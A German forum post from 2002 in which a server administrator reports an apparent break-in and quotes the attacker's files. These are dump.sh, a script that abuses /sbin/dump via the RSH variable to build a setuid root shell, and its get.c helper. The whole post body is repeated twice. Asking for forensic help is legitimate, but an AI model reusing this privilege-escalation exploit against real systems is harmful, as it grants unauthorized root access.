Hilfesuchender
31.10.02, 17:02
Hallo.
Ich hab nen alten LAMPS mit SuSE 7.0 am laufen.
Auf einmal war kein Login als root mehr möglich.
Root PW hab ich jetzt n neues eingestellt.
Allerdings weiß ich nicht genau was der Eindringling (wenn den einer da war und es kein Fehler ist) genau gemacht hat.
Ich habe allerdings unter /tmp folgende Dateien gefunden:
dump.sh, dump.sh, execute_me, get, get.c sowie adduser
Die Datein gehören alle root. Gruppe ist wwwrun.
In der dump.sh steht folgendes:
-------------------------------------------------
#!/bin/sh
#################
# Coded by ext2 #
#################
cat > execute_me << EOF
#!/bin/sh
echo "#include <stdio.h>" > get.c
echo "int main() { " >> get.c
echo " setuid(0);" >> get.c
echo " execl(\"/bin/sh\", \"-bash\", NULL);" >> get.c
echo " return 0;" >> get.c
echo "}" >> get.c
gcc -o get get.c
chown root: get
chmod 4777 get
EOF
chmod +x execute_me
##########################
# Exploitando dump :) #
##########################
export TAPE=garbage:garbage
export RSH=./execute_me
/sbin/dump -0 /
echo "Execute ./get para ter id=0 ;p"
echo "ext2 owns you ! ;)"
./get
-------------------------------------------------
Und in der get.c:
-------------------------------------------------
#include <stdio.h>
int main() {
setuid(0);
execl("/bin/sh", "-bash", NULL);
return 0;
}
-------------------------------------------------
Ich hab damit schon mal n wenig Google gefüttert, aber ohne Erfolg.
Hat vielleicht jemand ne Idee, was da genau abgelaufen ist, bzw wo die Sicherheitslücke sein könnte?
Besteht überhaupt eine Chance (ohne Neuinstallation) das System wieder sicher zu bekommen.
Immerhin sieht das für mich stark danach aus, daß der Angreifer root Rechte hatte :(
Ich hab nen alten LAMPS mit SuSE 7.0 am laufen.
Auf einmal war kein Login als root mehr möglich.
Root PW hab ich jetzt n neues eingestellt.
Allerdings weiß ich nicht genau was der Eindringling (wenn den einer da war und es kein Fehler ist) genau gemacht hat.
Ich habe allerdings unter /tmp folgende Dateien gefunden:
dump.sh, dump.sh, execute_me, get, get.c sowie adduser
Die Datein gehören alle root. Gruppe ist wwwrun.
In der dump.sh steht folgendes:
-------------------------------------------------
#!/bin/sh
#################
# Coded by ext2 #
#################
cat > execute_me << EOF
#!/bin/sh
echo "#include <stdio.h>" > get.c
echo "int main() { " >> get.c
echo " setuid(0);" >> get.c
echo " execl(\"/bin/sh\", \"-bash\", NULL);" >> get.c
echo " return 0;" >> get.c
echo "}" >> get.c
gcc -o get get.c
chown root: get
chmod 4777 get
EOF
chmod +x execute_me
##########################
# Exploitando dump :) #
##########################
export TAPE=garbage:garbage
export RSH=./execute_me
/sbin/dump -0 /
echo "Execute ./get para ter id=0 ;p"
echo "ext2 owns you ! ;)"
./get
-------------------------------------------------
Und in der get.c:
-------------------------------------------------
#include <stdio.h>
int main() {
setuid(0);
execl("/bin/sh", "-bash", NULL);
return 0;
}
-------------------------------------------------
Ich hab damit schon mal n wenig Google gefüttert, aber ohne Erfolg.
Hat vielleicht jemand ne Idee, was da genau abgelaufen ist, bzw wo die Sicherheitslücke sein könnte?
Besteht überhaupt eine Chance (ohne Neuinstallation) das System wieder sicher zu bekommen.
Immerhin sieht das für mich stark danach aus, daß der Angreifer root Rechte hatte :(